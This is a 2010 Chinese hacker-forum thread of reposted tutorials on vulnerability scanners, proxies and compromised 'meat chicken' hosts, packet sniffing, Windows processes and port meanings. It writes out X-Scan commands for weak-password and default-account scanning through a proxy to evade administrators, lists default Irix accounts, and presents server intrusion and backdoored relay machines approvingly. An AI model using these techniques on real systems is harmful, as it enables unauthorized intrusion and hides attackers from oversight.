  “看来你现在也是一个手里没有刀的黑客,扫描器在一个成熟的黑客手里有着相当大的作用。因为进化到会用扫描器一级的黑客,他们就会很少有人在对那些无知的个人用户感兴趣,注意力更多的被吸引到了服务器上。而对付服务器最好的方法就是找到服务器系统的漏洞,或者服务器相关软件的漏洞。对于传统的手工查找来说,不但查找漏洞的速度过于缓慢,而且多数情况下只能针对某一个特定的漏洞,感觉有点大海捞针的味道。而扫描器就是一种快速寻找服务器系统相关漏洞的工具,通过它们,黑客可以根据自己的带宽和系统情况,以他们自己喜欢的速度和方式来快速的寻找系统漏洞,而且这多数扫描器可以同时扫描多种漏洞,很容易找到系统的漏洞和弱点,此时黑客就可以根据扫描器提供的漏洞报告和信息,采用合适的攻击方法对目标给以致命的一击。”

  “前辈,那我如何找到扫描器,平时我好像很少接触到这些东西啊。”

  “呵呵,你用过小榕的流光系列吗?”

  “这个当然是接触过了。”

  “其实小榕的流光就是一款结合强大扫描功能的软件,只不过他在流光中加入了一些攻击和破解成份。”

“扫描器果然强大,我就曾用流光攻破过许多的黄色和反动网站,特别是他的FTP和新加入的SQLCMD功能,非常的强大。而且界面非常的友好,让我这种菜鸟用户很容易上手。”



  “你说的不错,但是虽然小榕的流光非常出色,并兼备强大的破解和攻击成份,但是总的来说它不能算的上是一个真正的扫描器。而且流光主要体现在破解,攻击性很强,没有太多的对目标系统扫描后的分析报告,所以流光在我看来只能算是是一个涵盖扫描功能的强大破解软件。”

  “那么在前辈的眼中,什么样的软件是一个强大的扫描软件,什么样的扫描器才能成为黑客手中的屠龙刀?”

  “一个好的扫描器必须有简洁和易于使用的操作界面,强大的分析和扫描信息范围,对最新漏洞的扫描判断能力(也就是通常所说的升级概念),详细的分析结果报告和对漏洞的描述与对策。这样的“刀”才能算的上是黑客手中的一把宝刀。”

  “前辈能否给我点评一下如今最为流行的扫描器的特点和性能呢?”

  “说道当今网络安全界流行的扫描器,其中最为优秀的就要算是ISS公司出品的商业扫描器了。它能针对上千种的系统和软件漏洞对服务器作出全面的细微扫描,而且能够生成比较详细的扫描报告,应该说是先进最好的扫描器了。”

  “前辈这个扫描器我可以从什么地方下载?”

  “无知!商业扫描器,当然是不能免费下载的了,你要花钱去买!”

  “还需要花钱啊,哪有没有不花钱的扫描器呢?”

  “当然有了,扫描器是黑客必备的工具之一,要是都花钱去买那不符合黑客的风格。我们可以在网上找到很多免费的而且同样很优秀的黑客扫描器。在国外比较常用的有Cerberus Internet Scanner简称CIS,还有乌克兰SATAN。我们国内的也有安全焦点的X-Scanner,与小榕的流光。”

  “前辈说的这几种扫描器我只用过流光,我个人认为流光很出色,其他的扫描器也只有所耳闻,但不知道有什么特点,还请前辈赐教。”

  “比起你用过的流光来说,ISS算得上是一个真正的管理员使用的系统扫描工具,首先它能扫描一些众所周知的系统漏洞和系统弱点,包括一些往往被用户忽略的问题,这些问题是一些经常被黑客利用的漏洞和弱点。ISS有更为强大的漏洞分析功能,并且它不会允许非法访问,但是实际情况是ISS已经背离了它的初衷目的。”

  “任何好的事物都有不利的一面,更何况一把刀,而且是把宝刀。”

  “这话不错,ISS的确是安全界最为出色的扫描器,而且他还是第一个可以公开得到的多层次扫描器。特别是它的可移植性和灵活性,众多的UNIX的平台上都可以运行ISS,ISS的扫描时间和效率也是很快的,很适合于企业级的用户。”
“前辈,我插一句话,虽然ISS足够强大,但是它毕竟不是免费的午餐,这就不符合我们的黑客精神了。您那里有没有一些强大而且免费的扫描器?”

  “扫描器庞大的家族中怎么会没有免费的,你听说过NMAP吗?”

  “NMAP倒是有所耳闻,以前在许多安全网站上见到过这个名字,但是我不知道它是干什么用的一个东西。”

  “NMAP其实就是一个功能强大的扫描器。它的强大之处在于它支持UDP,TCP (connect),TCP SYN(half open),ftp proxy(bounce attack),Reverse-ident,ICMP(ping sweep),FIN,ACK sweep,Xmas Tree,SYN sweep,Null等多种扫描协议和扫描方式。但是总的来说它的最大的优点莫过于隐蔽性高,这是由于它采用的是“半开”的一种扫描方式,此外它提供的Stealth FIN,Xmas Tree与Null扫描模式更是让被扫描者难以发现。也正是因为这一点的原因,NMAP深受一些骨灰级黑客的喜爱。像一般黑客喜欢的秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等,NMAP均可以实现,可以说NMAP是一个灵活性很大的扫描器。通过强大系统的扫描,它还可以分析出服务器的端口处于Open状态还是被防火墙保护状态。总之它的强大是不言而喻的,如果你有一台联网的Linux或者UNIX计算机,那么你就可以去http://www.insecure.org/nmap/ 下载得到它。

B9层 发表时间: 10-07-16 18:22

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
黑客常用兵器之扫描篇(下)


  “前辈,我的系统使用的是Windows,您能不能介绍一些我这种菜鸟级黑客也能用的扫描器?当然前提是在Windows系统下运行啊。”

  “既然这样,我想Cerberus Internet Scanner(CIS)可能比较合适与你,它主要运行在Windows NT和Windows2000的平台下面,当然它也主要是针对微软的Windows操作系统进行探测扫描的。CIS拥有绝大多数菜鸟喜欢的Windows友好界面,而且它提供进行扫描的安全问题也是通常在Windows中经常见到的,其中包括:
  (1) WWW服务
  (2) FTP服务
  (3) MS SQL Server 数据库扫描
  (4) NetBIOS 共享扫描
  (5) 注册表设置
  (6) NT服务漏洞
  (7) SMTP服务扫描
  (8) POP3服务扫描
  (9) RPC服务扫描
  (10) 端口映射
  (11) Finger服务
  (12) DNS安全扫描
  (13) 浏览器安全等



  在CIS中,它最为引人注目的还要数NetBIOS共享扫描。CIS能根据NetBIOS这一漏洞作出NETBIOS资源信息、共享资源、计算机用户名、工作组和薄弱的用户口令等详细的扫描分析。它的操作方法也是非常的容易,你只需要输入目标服务器的地址,然后选择你想要扫描的相关漏洞就可以进行扫描分析了。扫描完毕后他会主动生成一个HTML的报告共你分析结果。你可以在http://www.cerberus-infosec.co.uk/ 下载获得。”

“这款扫描器的功能是否太过于简单了哪?我感觉它比起前几个您说的那些扫描器,功能过于少了,而且没有流光那么有成效。”


  “SATAN作为扫描器的鼻祖可能很适合你,由于它采用的是一个Perl的内核,通过PERL调用大量的C语言的检测工具对目标网站进行分析,所以你打开浏览器用IE方式就可以直接操作,使用也相对简单,我就不在这里介绍他浪费时间了。

  作为黑客的利刃,国产的CGI & Web Scanner也是一个不错的扫描器,这个宝刀是由zer9设计完成打造的。这款扫描器主要是针对动态网站技术的安全问题来设计的。”

  “动态网站?”

  “对,动态网站。随着网站设计的日趋复杂化,网站的技术人员会利用一些诸如CGI、ASP、PHP、jsP等网站动态交互技术与相应的服务软件对网站进行开发,这些东西大大地减轻了网站的维护和更新工作量,但是也正是这些技术,导致了大量的安全问题,特别是很多网站动态第三方程序在设计之初根本就没有对安全问题考虑太多,导致了大量的系统漏洞的出现。而CGI & Web Scanner就是专门针对这些动态的网页上出现的漏洞进行扫描的一把利刃。

  CGI & Web Scanner的主要功能有:
  (1) 检测203个已知的CGI漏洞
  (2) 通过HTTPD辨认服务器类型
  (3) 有更新漏洞的功能
  (4) Microsoft SQL Server DOS检测
  (5) Httpd Overflow检测
  (6) IIS Hack检测
  (7) ASP检测
  (8) DOT 漏洞检测

  而且它可以多线程扫描,并对常见的D.O.S(拒绝服务攻击)和Overflow等也进行探测,很适合初级杀手作为武器。至于你关心的使用方法,就更为简单了,输入目标服务器的IP地址,选择需要扫描的漏洞种类点击扫描按键,就开始了。”


  “没有想到国产扫描器还有如此优秀的!”

  “这个是自然,作为黑客的必备武器之一,国产扫描器有很多优秀的作品,前面我提到的安全焦点的X-Scanner,就是我最为欣赏的扫描器,而且我老人家也时常常的使用,但是不知道为什么,在对X-Scanner进行病毒测试的时候,熊猫和KV3000都能在X-Scanner里面发现两个木马程序。这一点是我们要非常的注意的。当然也要请安全焦点的朋友做做解释工作。”

  “前辈既然如此欣赏X-Scanner,那就给我详细介绍一下吧!”



  “X-Scanner运行在Windows平台下,它主要针对WindowsNT/Windows 2000操作系统的安全进行全面细致评估,可以扫描出很多Windows系统流行的漏洞,并详细的指出安全的脆弱环节与弥补措施。X-Scanner采用多线程方式对指定IP地址段(或单机)进行安全漏洞扫描,支持插件功能,提供了图形界面和命令行两种操作方式。
 扫描范围包括:
  (1)标准端口状态及端口banner信息;
  (2)CGI漏洞;
  (3)RPC漏洞;
  (4)SQL-SERVER默认帐户;
  (5)FTP弱口令;
  (6)NT主机共享信息;
  (7)用户信息;
  (8)组信息;
  (9)NT主机弱口令用户等。

  X-Scanner会将扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。并对于一些已知漏洞,X-Scanner给出了相应的漏洞描述,利用程序及解决方案。X-Scanner扫描的内容是绝大多数的服务器容易出现的漏洞和安全设置问题。最常用的还是其中的SQL默认帐户、FTP弱口令和共享扫描,他们能揭示出许多麻痹大意的网管犯的一些低级错误。”


  “前辈能不能具体说说X-Scanner如何使用呢?”

  “打开了X-Scanner,在扫描项目中可以任意的指定单独扫描哪一个特定的项目。比较多的是CGI和SQL或者FTP默认口令,这些都是很致命的服务器漏洞。”



  “下一步需要在〖扫描设置〗中进行参数的设置。一般的情况下,只对〖运行参数〗中的扫描范围进行设置。在那里只要填写网站服务器的IP地址就可以,可以填写一个来针对某一个特定的网站或服务器,也可以填写一个IP段范围,来扫描一段IP地址上所有的计算机。具体扫描参数格式如下:

  1.命令行:Xscan -h [起始地址]<-[终止地址]> [扫描选项]

   其中的[扫描选项]含义如下:
   -p: 扫描标准端口(端口列表可通过\dat\config.ini文件定制);
   -b: 获取开放端口的banner信息,需要与-p参数合用;
   -c: 扫描CGI漏洞;
   -r: 扫描RPC漏洞;
   -s: 扫描SQL-SERVER默认帐户;
   -f: 尝试FTP默认用户登录(用户名及口令可以通过\dat\config.ini文件定制);
   -n: 获取NetBios信息(若远程主机操作系统为Windows9x/NT4.0/2000);
   -g: 尝试弱口令用户连接(若远程主机操作系统为Windows NT4.0/2000);
   -a: 扫描以上全部内容;

-x [代理服务器:端口]: 通过代理服务器扫描CGI漏洞;
   -t: 设置线程数量,默认为20个线程;
   -v: 显示详细扫描进度;
   -d: 禁止扫描前PING被扫主机。

  2.示例:
  Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a
  含义:扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息;

  Xscan -h xxx.xxx.1.1 -n -g -t 30
  含义:获取XXX.XXX.1.1主机的Netbios信息,并检测NT弱口令用户,线程数量为30;

  Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d
  含义:扫描xxx.xxx.1.1主机的标准端口状态,通过代理服务器"129.66.58.13:80"扫描CGI漏洞,检测端口banner信息,且扫描前不通过PING命令检测主机状态,显示详细扫描进度。”



  “在〖运行参数〗中,有很大的选择余地,比如它可以设置代理服务器来躲避网管的追查,并课以设置扫描的线程。对扫描显示也可以进行详细的选择。然后扫描器就开始工作了。”

  “好啊,我去试试。”

  “另外我要提醒你注意的是,在使用这些扫描软件的时候一定要看清楚里面有没有可以的程序,以防自己先中了别人的招。此外,虽然你刺客手中有刀,但是现在的网站管理员也会使用这些宝刀,所以说,手中有绝世好刀,不一定就能杀死所有的敌人。好了,你去吧!”

B10层 发表时间: 10-07-16 18:23

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
代理、肉鸡、跳板的概念

看到有的网友还用那种8080、80端口的代理,我有话说,也可以说为大家做一点最最基础的黑客教程,大家看完自己去做吧,具体怎么做,我就不说了,可以说我把我所知道的肉鸡和跳板的概念知识全部告诉大家了,我也在几个地方发表过,这是我的原创,我要告诉大家的是真正在黑客抢劫服务器是用的跳板是什么,以及黑客们很少说的跳板知识介绍~~~~~~~~~~我有个习惯,
总是喜欢让大家看一篇文章的时候知道:为 什么要看这篇文章?这篇文章要让
自己知道或是学到什么东西,我尽量把自己所 掌握的东西尽量简化后用通俗的
语言表达。大家看完后有什么不好的地方,请指出,我好学习到新的东西,我很高兴自己能
把自己所学到的东西和大家分享,在 这里的认识的网友们有想成为黑客的;有
想随便玩玩;有的想学,但是不久就感
觉学网络安全很难就退却了。我真的很希望大家能找到自己的目标,做自己喜欢
的事情,不要一天就黑小企鹅和一天泡在别人的软件里(至少要尝试读一些简单的

代码),学习黑客知识是孤独的,必须完全靠自己的努力,很少有人能帮你的,

开始你会觉得很无助,但是慢慢的,你将习惯这种感觉和方式,要自己努力才会

有成果的,我和大家一样也在不停的探索网络知识,现在不过是把自己学到的东

西和大家分享罢了。是不是我象大姨妈啊!!呵呵~~~婆婆***!我看到很
多的网友聊代理的时候,概念很模糊,甚至搞出了笑话,所以今天我就谈谈很多
朋友初涉网安的一个

误区(认识代理、跳板、肉鸡)。有的网友说那还不简单,找个运行就能隐藏IP

的软件,我早说过了,我没有见过这种软件或许说根本不存在这种软件(懒惰的

人更勤于此道)再者对抢劫服务器者而言把自己的身家性命放在一个隐藏自己IP的软件

上是很不明智的,要知道抢劫服务器时会尝试很多的连接,在你一不小心的时候你就把

自己卖了(我曾经在一次抢劫服务器完毕后没有用sc32设置好跳板的IE,而是随手在

桌面上双击浏览器去看黑页,结果把自己给卖了,本来没有什么可怕的,但是我

们要养成做任何事都无懈可击的习惯。再者~~~嘘嘘~~还好是RB鬼子的系统

。)所以我根本不相信什么隐藏IP的软件,也许我孤陋寡闻或是真有这样的东西

,但至少我是不会用的,除非有人张罗着把我毙了,那么我可以考虑一下。

我要说此文适合菜鸟阅读,高手止步!!!

我上小企鹅,老有网友问我代理和跳板以及肉鸡是指同一类概念吗?它们怎么样工

作的?

因为在小企鹅上不可能讲很清楚,涉及的东西太多了,因为此文是面向和我一样初


人涉网络网络安全的朋友,那么我就简单的说说。

首先是代理(泛指80;8080;1080端口),很多网友认为用代理猎手设置好

端口之后就可以为自己找个代理在IE、FTP等里面设置后来隐藏IP,这就是肉鸡

或认为这就是跳板,其实不然,为什么呢?就我个人来看这样的代理简直就是垃

圾(有的网友不服气了,等等,我一会告诉你为什么我这么说),1、首先一个

速度比较慢,我用这样的代理用过很多国家,包括国内的,感觉都是其慢,没有

那种快速的感觉;2、不稳定。大家一定都想拥有一个稳定的代理吧~~~呵呵

但是这样的代理通常有原因的,不是服务器自身漏洞就是为了自身利益而增加的

服务,当他的愿望达成以后或是网管发现以后,你就不能再用了。3、多人使用。如果你

用8080、1080、80等端口的代理,我敢保证这个代理不止你一个人用,如果

你想成为一个黑客或是老手的话,拥有一个自己的代理是必须的。4、保密性。

有的代理服务器提供者很可恶,他们利用代理得知你的密码或一些敏感信息,因

为普通代理数据没有经过加密(1080端口除外),用一个嗅探器就可以知道你

输入的数据,别忘了代理的最最基本原理是数据转发哟。好了,有了以上的缺点

你还敢用或是有信心用它吗?这就是我为什么叫它LJ的原因了。有网友会问:

那什么样的代理才没有这些缺点呢?别急,我下面就要说。

socks5.这是一个很不错的跳板软件,很小(32K)功能却是不凡,它是sock4

的接替者,原来的sock4只支持UDP协议(这个大家去看书吧,我不多说了),

而sock5支持USP和TCP两种协议,还有数据的传输是加密的所以真的很佩服作者的编程能力。如果你简

单的使用它,那你上个小企鹅啊或IRC啦,那是没有什么问题啦,而且它的速度很快

几乎和你使用本地机没有什么差别(当然不能加太多跳板),sock5支持你搭建

255个跳板,也就是你可以用skserverGUI来编辑多达255个安装了sock5的机

器来运行达到你隐藏IP的目的,但我想如果我看见有人这样做的话,我会马上打

电话到精神病院~~~:)而且用sc32来配合skserverGUI的话,那么你的电脑

几乎就没有应用程序不能用代理的。你用过之后一定会说:我喜欢!我选择!sock5的安装也很简单,在此软件的说明书里有,因为我主要是让大家了解代理------&g*;跳板------&g*;肉鸡的简单原理;再者因为制作这样的跳板或肉鸡很有攻击性(会构成非法使用

他人电脑),而且网上有很多人不自觉,我可不想以后有人被抓了,说我

曾经为他的犯罪生涯做过贡献。

好了!最后我们来说说肉鸡吧

肉鸡是什么?在小企鹅上也有朋友问我,我认为这是中国黑客对自己开了后门的服

务器为将来自己做一些事时使用的机器的一种自豪而又亲切的叫法.肉鸡是老手

常用的代理,也就是*elne*的那种,完全是靠自己制作的,端口加密码啦!绝对

只有你一个人用,当然被别人提前下手的话,那你就清除它的后门就可以了,当

你第一次拥有这种服务器的时候你的心情是什么样的?我个人感觉是象初恋一样



有3389肉鸡通常可以图形化*作,从而发动拒绝服务攻击,那么我们用什么样
系统的肉鸡呢?~~~~恩!marke这个

问题问的很好~~:)

我喜欢用windows 2000和linux,虽然我一直采用WIN 2000但是告诉大家一个

好消息我刚刚拥有了自己第一台LINUX肉鸡,对我这个正在学习LINUX的家伙来

说,没事到上面熟悉一下LINUX指令是件很愉快的事。要想学用这种肉鸡必须熟

练DOS指令(指windows),因为没有图形界面让你玩的。做一个黑客必须适应字符化的*作
当你*elne*到一台你服务器里(肉鸡)


你就可以踏雪无痕了,就象“信息公路牛崽”(抢劫服务器五角大楼的美国天才黑客)一

样先连接到RB、到中东、再绕回美国本土抢劫服务器五角大楼,听上去很神秘吧,其

实用的原理就是这个。

B11层 发表时间: 10-07-16 18:23

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
网络监听概念


网络监听工具的提供给管理员的一类管理工具。使用这种工具,可以监视网络的状态、数据流动情况以及网络上传输的信息。

  但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时,便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式,便可以源源不断地将网上传输的信息截获。

  网络监听可以在网上的任何一个位置实施,如局域网中的一台主机、网关上或远程网的调制解调器之间等。黑客们用得最多的是截获用户的口令。

  什么是网络监听

  网络监听是黑客们常用的一种方法。当成功地登录进一台网络上的主机,并取得了这台主机的超级用户的权限之后,往往要扩大战果,尝试登录或者夺取网络中其他主机的控制友。而网络监听则是一种最简单而且最有效的方法,它常常能轻易地获得用其他方法很难获得的信息。

  在网络上,监听效果最好的地方是在网关、路由器、防火墙一类的设备处,通常由网络管理员来操作。使用最方便的是在一个以太网中的任何一台上网的主机上,这是大多数黑客的做法。




以太网中可以监听的原因

  在电话线路和无线电、微波中监听传输的信息比较好理解,但是人们常常不太理解为什么局域网中可以进行监听。甚至有人问:能不能监听不在同一网段的信息。下面就讲述在以太网中进行监听的一些原理。在令牌环中,道理是相似的。

  对于一个施行网络攻击的人来说,能攻破网关、路由器、防火墙的情况极为少见,在这里完全可以由安全管理员安装一些设备,对网络进行监控,或者使用一些专门的设备,运行专门的监听软件,并防止任何非法访关。然而,潜入一台不引人注意的计算机中,悄悄地运行一个监听程序,一个黑客是完全可以做到的。监听是非常消耗CPU资源的,在一个担负繁忙任务的计算机中进行监听,可以立即被管理员发现,因为他发现计算机的响应速度令人惊奇慢。

  对于一台连网的计算机,最方便的是在以太网中进行监听,只须安装一个监听软件,然后就可以坐在机器旁浏览监听到的信息了。

  以太网协议的工作方式为将要发送的数据包发往连在一起的所有主机。在包头中包含着应该接收数据包的主机的正确地址。因此,只有与数据包中目标地址一致的那台主机才能接收信包。但是,当主机工在监听模式下,无论数据包中的目标物理地址是什么,主机都将接收。

  在Internet上,有许多这样的局域网。几台甚至十几台主机通过一条电缆一个集线器连在一起。在协议的高层或用户看来,当同一网络中的两台主机通信时,源主机将写有目的主机IP地址的数据包发向网关。但是,这种数据包并不能在协议栈的高层直接发送出去。要发送的数据包必须从TCP/IP协议的IP层交给网络接口,即数据链路层。

  网络接口不能识别IP地址。在网络接口,由IP层来的带有IP地址的数据包又增加了一部分信息:以太帧的帧头。在帖头中,有两个域分别为只有网络接口才能识别的源主机和目的主机的物理地址,这是一个48位的地址。这个48位的地址是与IP地址对应的。也就是说,一个IP地址,必然对应一个物理地址。对于作为网关的主机,由于它连接了多个网络,因此它同时具有多个IP地址,在每个网络中,它都有一个。发向局域网之外的帧中携带的是网关的物理地址。




在以太网中,填写了物理地址的帧从网络接口中,也就是从网卡中发送出去,传送到物理的线路上。如果局域网是由一条粗缆或细缆连接机而成,则数字信号在电缆上传输,信号能够到达线路上的每一台主机。当使用集线器时,发送出去的信号到达集线器,由集线器再发向连接在信线器上的每一条线路。于是,在物理线路上传输的数字信号也能到达连接在集线器上的每一主机。

  数字信号到达一台主机的网络接口时,在正常情况下,网络接口读入数据帧,进行检查,如果数据帧中携带的确良物理地址是自己的,或者物理地址是广播地址,则将数据帧交给上层协议软件,也就是IP层软件,否则就将这个帧丢弃。对于每一个到达网络接口的数据帧,都要进行这个过程。然而,当主机工作在监听模式下,则所有的数据帧都将被交给上层协议软件处理。

  局域网的这种工作方式,一个形象的例子是,大房间就像是一个共享的信道,里面的每个人好像是一台主机。人们所说的话是信息包,在大房间中到处传播。当我们对其中某个人说话时,所有的人都能听到。但只有名字相同的那个人,才会对这些话语做出反映,进行处理。其余的人听到了这些谈话,只能从发呆中猜测,是否在监听他人的谈话。

  当连接在同一条电缆或集线器上的主机被逻辑地分为几个子网时,如果一台主机处于监听模式下,它还能接收到发向与自己不在同一子网(使用了不同的掩码、IP地址和网关)的主机的那些信包。也就是说,在同一条物理信道上传输的所有信息都可以被接收到。

  许多人会问:能不能监听不在同一个网段计算机传输的信息。答案是否定的,一台计算机只能监听经过自己网络接口的那些信包。否则,我们将能监听到整个Internet,情形会多么可怕。





目前的绝大多数计算机网络使用共享的通信信道。从上面的讨论中,我们知道,通信信道的共享意味着,计算机有可能接收发向另一台计算机的信息。

  另外,要说明的是,Internet中使用的大部分协议都是很早设计的,许多协议的实现都是基于一种非常友好的,通信的双方充分信任的基础之上。因此,直到现在,网络安全还是非常脆弱的。在通常的网络环境下,用户的所有信息,包手户头和口令信息都是以明文的方式在网上传输。因此,对于一个网络黑客和网络攻击者进行网络监听,获得用户的各种信息并不是一件很困难的事。只要具有初步的网络和TCP/IP协议知识,便能轻易地从监听到的信息中提取出感兴趣的部分。

  网络监听常常要保存大量的信息,对收集的信息进行大量的整理工作,因此,正在进行监的机器对用户的请求响应很慢。

  首先,网络监听软件运行时,需要消耗大量的处理器时间,如果在此时,就详细地分析包中的内容,许多包就会来不信接收而漏掉。因此,网络监听软件通常都是将监听到的包存放在文件中,待以后再分析。

  其次,网络中的数据包非常复杂,两台主机之间即使连续发送和接受数据包,在监听到的结果中,中间必然会夹杂了许多别的主机交互的数据包。监听软件将同一TCP会话的包整理到一起,已经是很不错了。如果还希望将用户的详细信息整理出眯,需要根据协议对包进行大量的分析。面对网络上如此众多的协议,这个监听软件将会十分庞大。

  其实,找这些信息并不是一件难事。只要根据一定的规律,很容易将有用的信息一一提取出来。

B12层 发表时间: 10-07-16 18:24

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
系统进程信息

[system process] - [system process] - 进程信息
进程文件: [system process] or [system process]
进程名称: Windows内存处理系统进程
描述: Windows页面内存管理进程,拥有0级优先。


alg - alg.exe - 进程信息
进程文件: alg or alg.exe
进程名称: 应用层网关服务
描述: 这是一个应用层网关服务用于网络共享。


csrss - csrss.exe - 进程信息
进程文件: csrss or csrss.exe
进程名称: Client/Server Runtime Server Subsystem
描述: 客户端服务子系统,用以控制Windows图形相关子系统。


ddhelp - ddhelp.exe - 进程信息
进程文件: ddhelp or ddhelp.exe
进程名称: DirectDraw Helper
描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。


dllhost - dllhost.exe - 进程信息
进程文件: dllhost or dllhost.exe
进程名称: DCOM DLL Host进程
描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。


explorer - explorer.exe - 进程信息
进程文件: explorer or explorer.exe
进程名称: 程序管理
描述: Windows Program Manager或者Windows Explorer用于控制Windows图形Shell,包括开始菜单、任务栏,桌面和文件管理。


inetinfo - inetinfo.exe - 进程信息
进程文件: inetinfo or inetinfo.exe
进程名称: IIS Admin Service Helper
描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分,用于Debug调试除错。


internat - internat.exe - 进程信息
进程文件: internat or internat.exe
进程名称: Input Locales
描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。


kernel32 - kernel32.dll - 进程信息
进程文件: kernel32 or kernel32.dll
进程名称: Windows壳进程
描述: Windows壳进程用于管理多线程、内存和资源。


lsass - lsass.exe - 进程信息
进程文件: lsass or lsass.exe
进程名称: 本地安全权限服务
描述: 这个本地安全权限服务控制Windows安全机制。


mdm - mdm.exe - 进程信息
进程文件: mdm or mdm.exe
进程名称: Machine Debug Manager
描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft script Editor脚本编辑器。


mmtask - mmtask.tsk - 进程信息
进程文件: mmtask or mmtask.tsk
进程名称: 多媒体支持进程
描述: 这个Windows多媒体后台程序控制多媒体服务,例如MIDI。


mprexe - mprexe.exe - 进程信息
进程文件: mprexe or mprexe.exe
进程名称: Windows路由进程
描述: Windows路由进程包括向适当的网络部分发出网络请求。


msgsrv32 - msgsrv32.exe - 进程信息
进程文件: msgsrv32 or msgsrv32.exe
进程名称: Windows信使服务
描述: Windows信使服务调用Windows驱动和程序管理在启动。


mstask - mstask.exe - 进程信息
进程文件: mstask or mstask.exe
进程名称: Windows计划任务
描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。


regsvc - regsvc.exe - 进程信息
进程文件: regsvc or regsvc.exe
进程名称: 远程注册表服务
描述: 远程注册表服务用于访问在远程计算机的注册表。


rpcss - rpcss.exe - 进程信息
进程文件: rpcss or rpcss.exe
进程名称: RPC Portmapper
描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。


services - services.exe - 进程信息
进程文件: services or services.exe
进程名称: Windows Service Controller
描述: 管理Windows服务。


smss - smss.exe - 进程信息
进程文件: smss or smss.exe
进程名称: Session Manager Subsystem
描述: 该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调用Win32壳子系统和运行在Windows登陆过程。


snmp - snmp.exe - 进程信息
进程文件: snmp or snmp.exe
进程名称: Microsoft SNMP Agent
描述: Windows简单的网络协议代理(SNMP)用于监听和发送请求到适当的网络部分。


spool32 - spool32.exe - 进程信息
进程文件: spool32 or spool32.exe
进程名称: Printer Spooler
描述: Windows打印任务控制程序,用以打印机就绪。


spoolsv - spoolsv.exe - 进程信息
进程文件: spoolsv or spoolsv.exe
进程名称: Printer Spooler Service
描述: Windows打印任务控制程序,用以打印机就绪。


stisvc - stisvc.exe - 进程信息
进程文件: stisvc or stisvc.exe
进程名称: Still Image Service
描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。


svchost - svchost.exe - 进程信息
进程文件: svchost or svchost.exe
进程名称: Service Host Process
描述: Service Host Process是一个标准的动态连接库主机处理服务。


system - system - 进程信息
进程文件: system or system
进程名称: Windows System Process
描述: Microsoft Windows系统进程。


taskmon - taskmon.exe - 进程信息
进程文件: taskmon or taskmon.exe
进程名称: Windows Task Optimizer
描述: windows任务优化器监视你使用某个程序的频率,并且通过加载那些经常使用的程序来整理优化硬盘。


tcpsvcs - tcpsvcs.exe - 进程信息
进程文件: tcpsvcs or tcpsvcs.exe
进程名称: TCP/IP Services
描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。


winlogon - winlogon.exe - 进程信息
进程文件: winlogon or winlogon.exe
进程名称: Windows Logon Process
描述: Windows NT用户登陆程序。


winmgmt - winmgmt.exe - 进程信息
进程文件: winmgmt or winmgmt.exe
进程名称: Windows Management Service
描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求

B13层 发表时间: 10-07-16 18:26

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
端口全解析(上)

端口可分为3大类:

1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服 务的协议。例如:80端口实际上总是HTTP通讯。

2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

  本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。0通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试 图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为 0.0.0.0,设置ACK位并在以太网层广播。 1 tcpmux 这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp,guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux 并利用这些帐户。 7Echo你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen) 另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDPecho:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

